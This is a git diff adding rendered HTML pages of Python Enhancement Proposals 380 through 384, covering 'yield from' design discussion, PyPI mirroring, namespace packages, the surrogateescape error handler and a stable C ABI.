Suggestion: There should be some way to prevent the initial call to +__next__(), or substitute it with a send() call with a specified +value, the intention being to support the use of generators wrapped so +that the initial __next__() is performed automatically.

+

Resolution: Outside the scope of the proposal. Such generators should +not be used with yield from.

+

Suggestion: If closing a subiterator raises StopIteration with a +value, return that value from the close() call to the delegating +generator.

+

The motivation for this feature is so that the end of a stream of +values being sent to a generator can be signalled by closing the +generator. The generator would catch GeneratorExit, finish its +computation and return a result, which would then become the return +value of the close() call.

+

Resolution: This usage of close() and GeneratorExit would be +incompatible with their current role as a bail-out and clean-up +mechanism. It would require that when closing a delegating generator, +after the subgenerator is closed, the delegating generator be resumed +instead of re-raising GeneratorExit. But this is not acceptable, +because it would fail to ensure that the delegating generator is +finalised properly in the case where close() is being called for +cleanup purposes.

+

Signalling the end of values to a consumer is better addressed by +other means, such as sending in a sentinel value or throwing in an +exception agreed upon by the producer and consumer. The consumer can +then detect the sentinel or exception and respond by finishing its +computation and returning normally. Such a scheme behaves correctly +in the presence of delegation.

+

Suggestion: If close() is not to return a value, then raise an +exception if StopIteration with a non-None value occurs.

+

Resolution: No clear reason to do so. Ignoring a return value is not +considered an error anywhere else in Python.

+
+
+
+

Criticisms

+

Under this proposal, the value of a yield from expression would be +derived in a very different way from that of an ordinary yield +expression. This suggests that some other syntax not containing the +word yield might be more appropriate, but no acceptable +alternative has so far been proposed. Rejected alternatives include +call, delegate and gcall.

+

It has been suggested that some mechanism other than return in the +subgenerator should be used to establish the value returned by the +yield from expression. However, this would interfere with the +goal of being able to think of the subgenerator as a suspendable +function, since it would not be able to return values in the same way +as other functions.

+

The use of an exception to pass the return value has been criticised +as an “abuse of exceptions”, without any concrete justification of +this claim. In any case, this is only one suggested implementation; +another mechanism could be used without losing any essential features +of the proposal.

+

It has been suggested that a different exception, such as +GeneratorReturn, should be used instead of StopIteration to return a +value. However, no convincing practical reason for this has been put +forward, and the addition of a value attribute to StopIteration +mitigates any difficulties in extracting a return value from a +StopIteration exception that may or may not have one. Also, using a +different exception would mean that, unlike ordinary functions, +‘return’ without a value in a generator would not be equivalent to +‘return None’.

+
+
+

Alternative Proposals

+

Proposals along similar lines have been made before, some using the +syntax yield * instead of yield from. While yield * is +more concise, it could be argued that it looks too similar to an +ordinary yield and the difference might be overlooked when reading +code.

+

To the author’s knowledge, previous proposals have focused only on +yielding values, and thereby suffered from the criticism that the +two-line for-loop they replace is not sufficiently tiresome to write +to justify a new syntax. By dealing with the full generator protocol, +this proposal provides considerably more benefit.

+
+
+

Additional Material

+

Some examples of the use of the proposed syntax are available, and +also a prototype implementation based on the first optimisation +outlined above.

+

Examples and Implementation

+

A version of the implementation updated for Python 3.3 is available from +tracker issue #11682

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0380.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0381/index.html b/pep-0381/index.html new file mode 100644 index 00000000000..ab919637cd3 --- /dev/null +++ b/pep-0381/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 381 – Mirroring infrastructure for PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 381 – Mirroring infrastructure for PyPI

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>, Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Mar-2009
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a mirroring infrastructure for PyPI.

+
+
+

PEP Withdrawal

+

The main PyPI web service was moved behind the Fastly caching CDN in May 2013: +https://mail.python.org/pipermail/distutils-sig/2013-May/020848.html

+

Subsequently, this arrangement was formalised as an in-kind sponsorship with +the PSF, and the PSF has also taken on the task of risk management in the event +that that sponsorship arrangement were to ever cease.

+

The download statistics that were previously provided directly on PyPI, are now +published indirectly via Google Big Query: +https://packaging.python.org/guides/analyzing-pypi-package-downloads/

+

Accordingly, the mirroring proposal described in this PEP is no longer required, +and has been marked as Withdrawn.

+
+
+

Rationale

+

PyPI is hosting over 6000 projects and is used on a daily basis +by people to build applications. Especially systems like easy_install +and zc.buildout make intensive usage of PyPI.

+

For people making intensive use of PyPI, it can act as a single point +of failure. People have started to set up some mirrors, both private +and public. Those mirrors are active mirrors, which means that they +are browsing PyPI to get synced.

+

In order to make the system more reliable, this PEP describes:

+
    +
  • the mirror listing and registering at PyPI
  • +
  • the pages a public mirror should maintain. These pages will be used +by PyPI, in order to get hit counts and the last modified date.
  • +
  • how a mirror should synchronize with PyPI
  • +
  • how a client can implement a fail-over mechanism
  • +
+
+
+

Mirror listing and registering

+

People who want to mirror PyPI make a proposal on catalog-SIG. When a mirror is proposed on the mailing list, it is manually added to a mirror list in the PyPI application after it has been checked to be compliant with the mirroring rules.

+

The mirror list is provided as a list of host names of the +form

+
+
X.pypi.python.org
+

The values of X are the sequence a,b,c,…,aa,ab,… +a.pypi.python.org is the master server; the mirrors start +with b. A CNAME record last.pypi.python.org points to the +last host name. Mirror operators should use a static address, +and report planned changes to that address in advance to +distutils-sig.

+

The new mirror also appears at http://pypi.python.org/mirrors +which is a human-readable page that gives the list of mirrors. +This page also explains how to register a new mirror.

+
+

Statistics page

+

PyPI provides statistics on downloads at /stats. This page is +calculated daily by PyPI, by reading all mirrors’ local stats and +summing them.

+

The stats are presented in daily or monthly files, under /stats/days +and /stats/months. Each file is a bzip2 file with these formats:

+
    +
  • YYYY-MM-DD.bz2 for daily files
  • +
  • YYYY-MM.bz2 for monthly files
  • +
+

Examples:

+
    +
  • /stats/days/2008-11-06.bz2
  • +
  • /stats/days/2008-11-07.bz2
  • +
  • /stats/days/2008-11-08.bz2
  • +
  • /stats/months/2008-11.bz2
  • +
  • /stats/months/2008-10.bz2
  • +
+
+
+
+

Mirror Authenticity

+

With a distributed mirroring system, clients may want to verify that +the mirrored copies are authentic. There are multiple threats to +consider:

+
    +
  1. the central index may get compromised
  2. +
  3. the central index is assumed to be trusted, but the mirrors might be tampered with.
  4. +
  5. a man in the middle between the central index and the end user, +or between a mirror and the end user might tamper with datagrams.
  6. +
+

This specification only deals with the second threat. Some provisions +are made to detect man-in-the-middle attacks. To detect the first +attack, package authors need to sign their packages using PGP keys, so +that users verify that the package comes from the author they trust.

+

The central index provides a DSA key at the URL /serverkey, in the PEM +format as generated by “openssl dsa -pubout” (i.e. RFC 3280 +SubjectPublicKeyInfo, with the algorithm 1.3.14.3.2.12). This URL must +not be mirrored, and clients must fetch the official serverkey from +PyPI directly, or use the copy that came with the PyPI client software. +Mirrors should still download the key, to detect a key rollover.

+

For each package, a mirrored signature is provided at +/serversig/<package>. This is the DSA signature of the parallel URL +/simple/<package>, in DER form, using SHA-1 with DSA (i.e. as a +RFC 3279 Dsa-Sig-Value, created by algorithm 1.2.840.10040.4.3)

+

Clients using a mirror need to perform the following steps to verify +a package:

+
    +
  1. download the /simple page, and compute its SHA-1 hash
  2. +
  3. compute the DSA signature of that hash
  4. +
  5. download the corresponding /serversig, and compare it (byte-for-byte) +with the value computed in step 2.
  6. +
  7. compute and verify (against the /simple page) the MD-5 hashes +of all files they download from the mirror.
  8. +
+

An implementation of the verification algorithm is available from +https://svn.python.org/packages/trunk/pypi/tools/verify.py

+

Verification is not needed when downloading from central index, and +should be avoided to reduce the computation overhead.

+

About once a year, the key will be replaced with a new one. Mirrors +will have to re-fetch all /serversig pages. Clients using mirrors need +to find a trusted copy of the new server key. One way to obtain one +is to download it from https://pypi.python.org/serverkey. To detect +man-in-the-middle attacks, clients need to verify the SSL server +certificate, which will be signed by the CACert authority.

+
+
+

Special pages a mirror needs to provide

+

A mirror is a subset copy of PyPI, so it provides the same structure +by copying it.

+
    +
  • simple: rest version of the package index
  • +
  • packages: packages, stored by Python version, and letters
  • +
  • serversig: signatures for the simple pages
  • +
+

It also needs to provide two specific elements:

+
    +
  • last-modified
  • +
  • local-stats
  • +
+
+

Last modified date

+

CPAN uses a freshness date system where the mirror’s last +synchronisation date is made available.

+

For PyPI, each mirror needs to maintain a URL with simple text content +that represents the last synchronisation date the mirror maintains.

+

The date is provided in GMT, using the ISO 8601 format [2]. Each mirror is responsible for maintaining its own last-modified date.

+

This page must be located at /last-modified and must be served as a text/plain page.
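A sketch of producing such a page; the exact ISO 8601 profile used here (seconds precision with a “Z” suffix) is an assumption, since the PEP only mandates ISO 8601 in GMT:

from datetime import datetime, timezone
+
+def last_modified_payload():
+    # e.g. '2008-11-06T12:00:00Z', to be served as text/plain
+    return datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')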

+
+
+

Local statistics

+

Each mirror is responsible for counting all the downloads that were made through it. PyPI uses these figures to sum up all downloads and display the grand total.

+

These statistics are in CSV-like form, with a header in the first line. The file needs to obey PEP 305; basically, it should be readable by Python’s csv module.

+

The fields in this file are:

+
    +
  • package: the distutils id of the package.
  • +
  • filename: the filename that has been downloaded.
  • +
  • useragent: the User-Agent of the client that has downloaded the +package.
  • +
  • count: the number of downloads.
  • +
+

The content will look like this:

+
# package,filename,useragent,count
+zc.buildout,zc.buildout-1.6.0.tgz,MyAgent,142
+...
+
+
+

The counting starts the day the mirror is launched, and there is one file per day, compressed using the bzip2 format. Each file is named after the day it covers. For example, 2008-11-06.bz2 is the file for the 6th of November 2008.

+

These files are then provided in a folder called days. For example:

+
    +
  • /local-stats/days/2008-11-06.bz2
  • +
  • /local-stats/days/2008-11-07.bz2
  • +
  • /local-stats/days/2008-11-08.bz2
  • +
+

This page must be located at /local-stats.
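A sketch of consuming one of these files, assuming the CSV layout shown above; mirror is a placeholder base URL:

import bz2
+import csv
+import io
+import urllib.request
+
+def read_daily_stats(mirror, day):
+    raw = urllib.request.urlopen('%s/local-stats/days/%s.bz2' % (mirror, day)).read()
+    rows = csv.reader(io.StringIO(bz2.decompress(raw).decode('utf-8')))
+    next(rows)  # skip the '# package,filename,useragent,count' header
+    for package, filename, useragent, count in rows:
+        yield package, filename, useragent, int(count)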

+
+
+
+

How a mirror should synchronize with PyPI

+

A mirroring protocol called Simple Index was described and implemented by Martin v. Loewis and Jim Fulton, based on how easy_install works. This section synthesizes it and gives a few relevant links, plus a short note about the User-Agent header.

+
+

The mirroring protocol

+

Mirrors must reduce the amount of data transferred between the central server and the mirror. To achieve that, they MUST use the changelog() PyPI XML-RPC call, and only refetch the packages that have changed since the last synchronisation. For each changed package P, they MUST copy the documents /simple/P/ and /serversig/P. If a package is deleted on the central server, they MUST delete the package and all associated files. To detect modification of package files, they MAY cache the file’s ETag, and MAY request skipping it using the If-None-Match header.
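A sketch of that polling loop; the XML-RPC endpoint shown reflects the PyPI of this PEP’s era and is assumed here:

import time
+import xmlrpc.client
+
+client = xmlrpc.client.ServerProxy('https://pypi.python.org/pypi')
+since = int(time.time()) - 24 * 3600  # e.g. changes from the last day
+for name, version, timestamp, action in client.changelog(since):
+    # refetch /simple/<name>/ and /serversig/<name> for each changed package
+    print(name, action)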

+

Each mirroring tool MUST identify itself using a descriptive User-Agent header.

+

The pep381client package [1] provides an application that follows this protocol to mirror PyPI.

+
+
+

User-agent request header

+

In order to be able to differentiate actions taken by clients over +PyPI, a specific user agent name should be provided by all mirroring +software.

+

This also applies to clients such as:

+
    +
  • zc.buildout [3].
  • +
  • setuptools [4].
  • +
  • pip [5].
  • +
+

XXX user agent registering mechanism at PyPI ?

+
+
+

How a client can use PyPI and its mirrors

+

Clients that are browsing PyPI should be able to use alternative +mirrors, by getting the list of the mirrors using last.pypi.python.org.

+

Code example:

+
>>> import socket
+>>> socket.gethostbyname_ex('last.pypi.python.org')[0]
+'h.pypi.python.org'
+
+
+
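Building on this, a sketch of enumerating all mirrors, assuming the single-letter mirror naming scheme (a.pypi.python.org, b.pypi.python.org, and so on) described earlier in this PEP:

import socket
+import string
+
+def mirror_hosts():
+    last = socket.gethostbyname_ex('last.pypi.python.org')[0]  # e.g. 'h.pypi.python.org'
+    last_letter = last.split('.')[0]
+    for letter in string.ascii_lowercase:
+        yield '%s.pypi.python.org' % letter
+        if letter == last_letter:
+            break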

The clients so far that could use this mechanism:

+
    +
  • setuptools
  • +
  • zc.buildout (through setuptools)
  • +
  • pip
  • +
+
+
+

Fail-over mechanism

+

Clients that are browsing PyPI should be able to use a fail-over +mechanism when PyPI or the used mirror is not responding.

+

It is up to the client to decide which mirror should be used, maybe by +looking at its geographical location and its responsiveness.

+

This PEP does not describe how this fail-over mechanism should work, +but it is strongly encouraged that the clients try to use the nearest +mirror.

+

The clients so far that could use this mechanism:

+
    +
  • setuptools
  • +
  • zc.buildout (through setuptools)
  • +
  • pip
  • +
+
+
+

Extra package indexes

+

It is obvious that some packages will not be uploaded to PyPI, whether because they are private or because the project maintainer runs their own server where people can get the project’s packages. However, it is strongly encouraged that a public package index follow the PyPI and Distutils protocols.

+

In other words, the register and upload commands should be compatible with any package index server out there.

+

Software that is compatible with PyPI and Distutils so far:

+
    +
  • PloneSoftwareCenter [6], which is used to run the plone.org products section.
  • +
  • EggBasket [7].
  • +
+

An extra package index is not a mirror of PyPI, but can have some +mirrors itself.

+
+
+

Merging several indexes

+

When a client needs to get packages from several distinct indexes, it should be able to use each one of them as a potential source of packages. The indexes should be defined as an ordered list in which the client looks for a package.

+

Each independent index can of course provide a list of its mirrors.

+

XXX define how to get the hostname for the mirrors of an arbitrary +index.

+

This permits any combination at the client level, allowing for a reliable packaging system with all levels of privacy.

+

It is up to the client to deal with the merging.

+
+
+
+

References

+ +
+
+

Acknowledgments

+

Georg Brandl.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0381.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0382/index.html b/pep-0382/index.html new file mode 100644 index 00000000000..4aa4c88caea --- /dev/null +++ b/pep-0382/index.html @@ -0,0 +1,332 @@ + PEP 382 – Namespace Packages | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 382 – Namespace Packages

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
02-Apr-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

On the first day of sprints at US PyCon 2012 we had a long and +fruitful discussion about PEP 382 and PEP 402. We ended up rejecting +both but a new PEP will be written to carry on in the spirit of PEP +402. Martin von Löwis wrote up a summary: [2].

+
+
+

Abstract

+

Namespace packages are a mechanism for splitting a single Python package across multiple directories on disk. In current Python versions, an algorithm to compute the package’s __path__ must be formulated. With the enhancement proposed here, the import machinery itself will construct the list of directories that make up the package. An implementation of this PEP is available at [1].

+
+
+

Terminology

+

Within this PEP, the term package refers to Python packages as defined by Python’s import statement. The term distribution refers to separately installable sets of Python modules as stored in the Python package index, and installed by distutils or setuptools. The term vendor package refers to groups of files installed by an operating system’s packaging mechanism (e.g. Debian or Red Hat packages installed on Linux systems).

+

The term portion refers to a set of files in a single directory (possibly +stored in a zip file) that contribute to a namespace package.

+
+
+

Namespace packages today

+

Python currently provides pkgutil.extend_path to denote a package as a namespace package. The recommended way of using it is to put:

+
from pkgutil import extend_path
+__path__ = extend_path(__path__, __name__)
+
+
+

in the package’s __init__.py. Every distribution needs to provide the same contents in its __init__.py, so that extend_path is invoked independently of which portion of the package gets imported first. As a consequence, the package’s __init__.py cannot practically define any names, as the order of the package fragments on sys.path determines which portion is imported first. As a special feature, extend_path reads files named <packagename>.pkg, which allow declaring additional portions.

+

setuptools provides a similar function pkg_resources.declare_namespace +that is used in the form:

+
import pkg_resources
+pkg_resources.declare_namespace(__name__)
+
+
+

In the portion’s __init__.py, no assignment to __path__ is necessary, +as declare_namespace modifies the package __path__ through sys.modules. +As a special feature, declare_namespace also supports zip files, and +registers the package name internally so that future additions to sys.path +by setuptools can properly add additional portions to each package.

+

setuptools allows declaring namespace packages in a distribution’s +setup.py, so that distribution developers don’t need to put the +magic __path__ modification into __init__.py themselves.

+
+
+

Rationale

+

The current imperative approach to namespace packages has led to multiple slightly-incompatible mechanisms for providing namespace packages. For example, pkgutil supports *.pkg files; setuptools doesn’t. Likewise, setuptools supports inspecting zip files, and supports adding portions to its _namespace_packages variable, whereas pkgutil doesn’t.

+

In addition, the current approach causes problems for system vendors. Vendor packages typically must not provide overlapping files, and an attempt to install a vendor package that has a file already on disk will fail or cause unpredictable behavior. As vendors might choose to package distributions such that they all end up in a single directory for the namespace package, all portions would contribute conflicting __init__.py files.

+
+
+

Specification

+

Rather than using an imperative mechanism for importing packages, a +declarative approach is proposed here: A directory whose name ends +with .pyp (for Python package) contains a portion of a package.

+

The import statement is extended so that it computes the package’s __path__ attribute for a package named P as consisting of, optionally, a single directory name P containing a file __init__.py, plus all directories named P.pyp, in the order in which they are found in the parent package’s __path__ (or sys.path). If either of these is found, the search for additional portions of the package continues.

+

A directory may contain both a package in the P/__init__.py and +the P.pyp form.

+

No other change to the importing mechanism is made; searching for modules (including __init__.py) will continue to stop at the first module encountered. In summary, the process of importing a package foo works like this (an illustrative sketch follows the list):

+
    +
  1. sys.path is searched for directories foo or foo.pyp, or a file foo.<ext>. +If a file is found and no directory, it is treated as a module, and imported.
  2. +
  3. If a directory foo is found, a check is made whether it contains __init__.py. +If so, the location of the __init__.py is remembered. Otherwise, the directory +is skipped. Once an __init__.py is found, further directories called foo are +skipped.
  4. +
  5. For both directories foo and foo.pyp, the directories are added to the package’s +__path__.
  6. +
  7. If an __init__ module was found, it is imported, with __path__ being initialized to the path computed from all .pyp directories.
  8. +
+
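A pure-Python sketch of this __path__ computation (the real change would live in the import machinery itself; the helper name is hypothetical):

import os
+import sys
+
+def compute_package_path(name, search_path=None):
+    path, init_seen = [], False
+    for entry in search_path or sys.path:
+        plain = os.path.join(entry, name)
+        if not init_seen and os.path.isfile(os.path.join(plain, '__init__.py')):
+            path.append(plain)  # further plain directories of this name are skipped
+            init_seen = True
+        portion = plain + '.pyp'
+        if os.path.isdir(portion):
+            path.append(portion)
+    return path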
+

Impact on Import Hooks

+

Both loaders and finders as defined in PEP 302 will need to be changed to support namespace packages. Failure to conform to the protocol below might cause a package not to be recognized as a namespace package; loaders and finders not supporting this protocol must raise AttributeError when the functions below get accessed.

+

Finders need to support looking for *.pyp directories in step 1 of the above algorithm. To do so, a finder used as a path hook must support a method:

+
+
finder.find_package_portion(fullname)
+

This method will be called in the same manner as find_module, and it +must return a string to be added to the package’s __path__. +If the finder doesn’t find a portion of the package, it shall return +None. Raising AttributeError from above call will be treated +as non-conformance with this PEP, and the exception will be ignored. +All other exceptions are reported.

+

A finder may report both success from find_module and from +find_package_portion, allowing for both a package containing +an __init__.py and a portion of the same package.

+

All strings returned from find_package_portion, along with all +path names of .pyp directories are added to the new package’s +__path__.

+
+
+
+

Discussion

+

Original versions of this specification proposed the addition of +*.pth files, similar to the way those files are used on sys.path. +With a wildcard marker (*), a package could indicate that the +entire path is derived by looking at the parent path, searching for +properly-named subdirectories.

+

People then observed that support for the full .pth syntax is inappropriate, and the .pth files were changed to be mere marker files, indicating that a directory is a package. Peter Tröger suggested that .pth is an unsuitable file extension, as all file extensions related to Python should start with .py. Therefore, the marker file was renamed to .pyp.

+

Dinu Gherman then observed that using a marker file is not necessary, and that the directory extension itself could well serve as a marker. This is what this PEP currently proposes.

+

Phillip Eby designed PEP 402 as an alternative approach to this PEP, +after comparing Python’s package syntax with that found in other +languages. PEP 402 proposes not to use a marker file at all. At the +discussion at PyCon DE 2011, people remarked that having an explicit +declaration of a directory as contributing to a package is a desirable +property, rather than an obstacle. In particular, Jython developers +noticed that Jython could easily mistake a directory that is a Java +package as being a Python package, if there is no need to declare +Python packages.

+

Packages can stop filling out the namespace package’s __init__.py. As +a consequence, extend_path and declare_namespace become obsolete.

+

Namespace packages can start providing non-trivial __init__.py +implementations; to do so, it is recommended that a single distribution +provides a portion with just the namespace package’s __init__.py +(and potentially other modules that belong to the namespace package +proper).

+

The mechanism is mostly compatible with the existing namespace +mechanisms. extend_path will be adjusted to this specification; +any other mechanism might cause portions to get added twice to +__path__.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0382.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0383/index.html b/pep-0383/index.html new file mode 100644 index 00000000000..b401ec4220e --- /dev/null +++ b/pep-0383/index.html @@ -0,0 +1,287 @@ + PEP 383 – Non-decodable Bytes in System Character Interfaces | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 383 – Non-decodable Bytes in System Character Interfaces

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2009
+
Python-Version:
+
3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

File names, environment variables, and command line arguments are +defined as being character data in POSIX; the C APIs however allow +passing arbitrary bytes - whether these conform to a certain encoding +or not. This PEP proposes a means of dealing with such irregularities +by embedding the bytes in character strings in such a way that allows +recreation of the original byte string.

+
+
+

Rationale

+

The C char type is a data type that is commonly used to represent both +character data and bytes. Certain POSIX interfaces are specified and +widely understood as operating on character data, however, the system +call interfaces make no assumption on the encoding of these data, and +pass them on as-is. With Python 3, character strings use a +Unicode-based internal representation, making it difficult to ignore +the encoding of byte strings in the same way that the C interfaces can +ignore the encoding.

+

On the other hand, Microsoft Windows NT has corrected the original +design limitation of Unix, and made it explicit in its system +interfaces that these data (file names, environment variables, command +line arguments) are indeed character data, by providing a +Unicode-based API (keeping a C-char-based one for backwards +compatibility).

+

For Python 3, one proposed solution is to provide two sets of APIs: a byte-oriented one, and a character-oriented one, where the character-oriented one would be limited to not being able to represent all data accurately. Unfortunately, for Windows, the situation would be exactly the opposite: the byte-oriented interface cannot represent all data; only the character-oriented API can. As a consequence, libraries and applications that want to support all user data in a cross-platform manner have to accept a mish-mash of bytes and characters exactly in the way that caused endless troubles for Python 2.x.

+

With this PEP, a uniform treatment of these data as characters becomes +possible. The uniformity is achieved by using specific encoding +algorithms, meaning that the data can be converted back to bytes on +POSIX systems only if the same encoding is used.

+

Being able to treat such strings uniformly will allow application +writers to abstract from details specific to the operating system, and +reduces the risk of one API failing when the other API would have +worked.

+
+
+

Specification

+

On Windows, Python uses the wide character APIs to access +character-oriented APIs, allowing direct conversion of the +environmental data to Python str objects (PEP 277).

+

On POSIX systems, Python currently applies the locale’s encoding to +convert the byte data to Unicode, failing for characters that cannot +be decoded. With this PEP, non-decodable bytes >= 128 will be +represented as lone surrogate codes U+DC80..U+DCFF. Bytes below +128 will produce exceptions; see the discussion below.

+

To convert non-decodable bytes, a new error handler (PEP 293) +“surrogateescape” is introduced, which produces these surrogates. On +encoding, the error handler converts the surrogate back to the +corresponding byte. This error handler will be used in any API that +receives or produces file names, command line arguments, or +environment variables.
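For example, the handler round-trips a non-decodable byte like this:

>>> b'gr\xfcn'.decode('ascii', 'surrogateescape')
+'gr\udcfcn'
+>>> 'gr\udcfcn'.encode('ascii', 'surrogateescape')
+b'gr\xfcn'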

+

The error handler interface is extended to allow the encode error +handler to return byte strings immediately, in addition to returning +Unicode strings which then get encoded again (also see the discussion +below).

+

Byte-oriented interfaces that already exist in Python 3.0 are not +affected by this specification. They are neither enhanced nor +deprecated.

+

External libraries that operate on file names (such as GUI file +choosers) should also encode them according to the PEP.

+
+
+

Discussion

+

This surrogateescape encoding is based on Markus Kuhn’s idea that +he called UTF-8b [3].

+

While providing a uniform API to non-decodable bytes, this interface has the limitation that the chosen representation only “works” if the data are converted back to bytes with the surrogateescape error handler as well. Encoding the data with the locale’s encoding and the (default) strict error handler will raise an exception; encoding them with UTF-8 will produce nonsensical data.

+

Data obtained from other sources may conflict with data produced +by this PEP. Dealing with such conflicts is out of scope of the PEP.

+

This PEP allows the possibility of “smuggling” bytes in character +strings. This would be a security risk if the bytes are +security-critical when interpreted as characters on a target system, +such as path name separators. For this reason, the PEP rejects +smuggling bytes below 128. If the target system uses EBCDIC, such +smuggled bytes may still be a security risk, allowing smuggling of +e.g. square brackets or the backslash. Python currently does not +support EBCDIC, so this should not be a problem in practice. Anybody +porting Python to an EBCDIC system might want to adjust the error +handlers, or come up with other approaches to address the security +risks.

+

Encodings that are not compatible with ASCII are not supported by +this specification; bytes in the ASCII range that fail to decode +will cause an exception. It is widely agreed that such encodings +should not be used as locale charsets.

+

For most applications, we assume that they eventually pass data +received from a system interface back into the same system +interfaces. For example, an application invoking os.listdir() will +likely pass the result strings back into APIs like os.stat() or +open(), which then encodes them back into their original byte +representation. Applications that need to process the original byte +strings can obtain them by encoding the character strings with the +file system encoding, passing “surrogateescape” as the error handler +name. For example, a function that works like os.listdir, except for +accepting and returning bytes, would be written as:

+
def listdir_b(dirname):
+    fse = sys.getfilesystemencoding()
+    dirname = dirname.decode(fse, "surrogateescape")
+    for fn in os.listdir(dirname):
+        # fn is now a str object
+        yield fn.encode(fse, "surrogateescape")
+
+
+

The extension to the encode error handler interface proposed by this PEP is necessary to implement the ‘surrogateescape’ error handler, because there are required byte sequences which cannot be generated from replacement Unicode. However, the encode error handler interface presently requires replacement Unicode to be provided in lieu of the non-encodable Unicode from the source string. Then it promptly encodes that replacement Unicode. In some error handlers, such as the ‘surrogateescape’ proposed here, it is also simpler and more efficient for the error handler to provide a pre-encoded replacement byte string, rather than forcing it to calculate Unicode from which the encoder would create the desired bytes.
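A sketch of such a bytes-returning handler under the extended interface (the handler name is made up for illustration):

import codecs
+
+def hexlify_errors(exc):
+    if isinstance(exc, UnicodeEncodeError):
+        bad = exc.object[exc.start:exc.end]
+        # Return pre-encoded bytes directly, instead of replacement Unicode.
+        return b''.join(b'\\x%02x' % (ord(ch),) for ch in bad), exc.end
+    raise exc
+
+codecs.register_error('hexlify', hexlify_errors)
+print('caf\xe9'.encode('ascii', 'hexlify'))  # b'caf\\xe9'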

+

A few alternative approaches have been proposed:

+
    +
  • create a new string subclass that supports embedded bytes
  • +
  • use different escape schemes, such as escaping with a NUL +character, or mapping to infrequent characters.
  • +
+

Of these proposals, the approach of escaping each byte XX +with the sequence U+0000 U+00XX has the disadvantage that +encoding to UTF-8 will introduce a NUL byte in the UTF-8 +sequence. As a consequence, C libraries may interpret this +as a string termination, even though the string continues. +In particular, the gtk libraries will truncate text in this +case; other libraries may show similar problems.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0383.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0384/index.html b/pep-0384/index.html new file mode 100644 index 00000000000..0b20d5cebc4 --- /dev/null +++ b/pep-0384/index.html @@ -0,0 +1,505 @@ + PEP 384 – Defining a Stable ABI | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 384 – Defining a Stable ABI

+
+
Author:
+
Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
17-May-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at C API Stability (user docs) and +Changing Python’s C API (development docs).

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Currently, each feature release introduces a new name for the +Python DLL on Windows, and may cause incompatibilities for extension +modules on Unix. This PEP proposes to define a stable set of API +functions which are guaranteed to be available for the lifetime +of Python 3, and which will also remain binary-compatible across +versions. Extension modules and applications embedding Python +can work with different feature releases as long as they restrict +themselves to this stable ABI.

+
+
+

Rationale

+

The primary source of ABI incompatibility is changes to the layout of in-memory structures. For example, the way in which string interning works, or the data type used to represent the size of an object, have changed during the life of Python 2.x. As a consequence, extension modules making direct access to fields of strings, lists, or tuples would break if their code is loaded into a newer version of the interpreter without recompilation: offsets of other fields may have changed, making the extension modules access the wrong data.

+

In some cases, the incompatibilities only affect internal objects of the interpreter, such as frame or code objects. For example, the way line numbers are represented has changed in the 2.x lifetime, as has the way in which local variables are stored (due to the introduction of closures). Even though most applications probably never used these objects, changing them required changing the PYTHON_API_VERSION.

+

On Linux, changes to the ABI are often not much of a problem: the +system will provide a default Python installation, and many extension +modules are already provided pre-compiled for that version. If additional +modules are needed, or additional Python versions, users can typically +compile them themselves on the system, resulting in modules that use +the right ABI.

+

On Windows, multiple simultaneous installations of different Python +versions are common, and extension modules are compiled by their +authors, not by end users. To reduce the risk of ABI incompatibilities, +Python currently introduces a new DLL name pythonXY.dll for each +feature release, whether or not ABI incompatibilities actually exist.

+

With this PEP, it will be possible to reduce the dependency of binary extension modules on a specific Python feature release, and applications embedding Python can be made to work with different releases.

+
+
+

Specification

+

The ABI specification falls into two parts: an API specification, specifying what function (groups) are available for use with the ABI, and a linkage specification specifying what libraries to link with. The actual ABI (layout of structures in memory, function calling conventions) is not specified, but implied by the compiler. For selected platforms, a specific ABI is recommended.

+

During evolution of Python, new ABI functions will be added. +Applications using them will then have a requirement on a minimum +version of Python; this PEP provides no mechanism for such +applications to fall back when the Python library is too old.

+
+

Terminology

+

Applications and extension modules that want to use this ABI +are collectively referred to as “applications” from here on.

+
+
+

Header Files and Preprocessor Definitions

+

Applications shall only include the header file Python.h (before +including any system headers), or, optionally, include pyconfig.h, and +then Python.h.

+

During the compilation of applications, the preprocessor macro +Py_LIMITED_API must be defined. Doing so will hide all definitions +that are not part of the ABI.

+
+
+

Structures

+

Only the following structures and structure fields are accessible to +applications:

+
    +
  • PyObject (ob_refcnt, ob_type)
